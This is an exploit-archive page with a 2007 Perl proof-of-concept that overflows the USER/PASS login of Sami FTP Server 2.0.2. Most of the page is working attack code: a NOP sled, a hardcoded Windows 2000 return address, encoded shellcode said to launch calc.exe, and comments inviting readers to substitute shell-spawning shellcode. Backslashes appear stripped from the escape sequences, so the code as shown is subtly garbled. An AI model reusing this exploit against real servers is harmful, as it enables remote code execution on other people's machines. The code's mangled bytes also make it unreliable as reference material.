Sami FTP Server 2.0.2 (USER/PASS) Remote Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Sami FTP Server 2.0.2 (USER/PASS) Remote Buffer Overflow Exploit
# Published : 2007-01-17
# Author : UmZ
# Previous Title : Novell NetWare 6.5 SP2-SP7 LSASS CIFS.NLM Overflow
# Next Title : Intel Centrino ipw2200BG Wireless Driver Remote Overflow PoC

#!/usr/bin/perl
#		Exploit for SAMI FTP  version 2.0.2
#		USER/PASS BUFFER OVERFLOW ARBITARY REMOTE CODE EXECUTION (CALC.exe) 
#		You can put you own shellcode to spawn a shell
#		Thrusday 17th  Jan 2007
#		Tested on : Windows 2000 SP4  (Use your own return address for other flavors)		
#		
#				
#		
#		Coded by UmZ! umz32.dll@gmail.com
#		On behalf of : Secure Bytes Inc.
#		http://www.secure-bytes.com/exploits/
#	
#
#	
#	    Special Thanks to Ahmad Tauqeer, Ali Shuja and Uquali
#
#
#	    Disclaimer: This Proof of concept exploit is for educational purpose only.
#		        Please do not use it against any system without prior permission.
#          		You are responsible for yourself for what you do with this code.
#
#
#	    Note:	After executing the exploit You will get "Cannot login User or password not correct."
#			That doesn't mean exploit failed whenever you click on Sami FTP server it will crash 
#			resulting in the execution of calc.exe and will execute whenever the SAMI FTP server 
#			restarts until it is reinstalled.


use Net::FTP;


print "Coded by UmZ! umz32.dll@gmail.comn";
print "http://www.secure-bytes.com/exploits/n";
	
$ftp = Net::FTP->new("192.168.100.250", Debug => 0) or die "Cannot connect : $@";

my $msg ="x90" x596;      #140
my $msg2 ="B"x484;
my $shellcode =  "x31xc9x83xe9xdbxd9xeexd9x74x24xf4x5bx81x73x13xd8".
		 "x22x72xe4x83xebxfcxe2xf4x24xcax34xe4xd8x22xf9xa1".
		 "xe4xa9x0exe1xa0x23x9dx6fx97x3axf9xbbxf8x23x99x07".
		 "xf6x6bxf9xd0x53x23x9cxd5x18xbbxdex60x18x56x75x25".
		 "x12x2fx73x26x33xd6x49xb0xfcx26x07x07x53x7dx56xe5".
		 "x33x44xf9xe8x93xa9x2dxf8xd9xc9xf9xf8x53x23x99x6d".
		 "x84x06x76x27xe9xe2x16x6fx98x12xf7x24xa0x2dxf9xa4".
		 "xd4xa9x02xf8x75xa9x1axecx31x29x72xe4xd8xa9x32xd0".
		 "xddx5ex72xe4xd8xa9x1axd8x87x13x84x84x8exc9x7fx8c".
		 "x28xa8x76xbbxb0xbax8cx6exd6x75x8dx03x30xccx8dx1b".
		 "x27x41x13x88xbbx0cx17x9cxbdx22x72xe4";

my $test= "x90" x 108;

my $msg1=$msg. "x70xFDx8Bx01"."x96x64xF8x77". $test .  $shellcode. "rn";

$ftp->login($msg1."rn","umz") or die "Cannot login ", $ftp->message;

$ftp->quit;

# www.Syue.com [2007-01-17]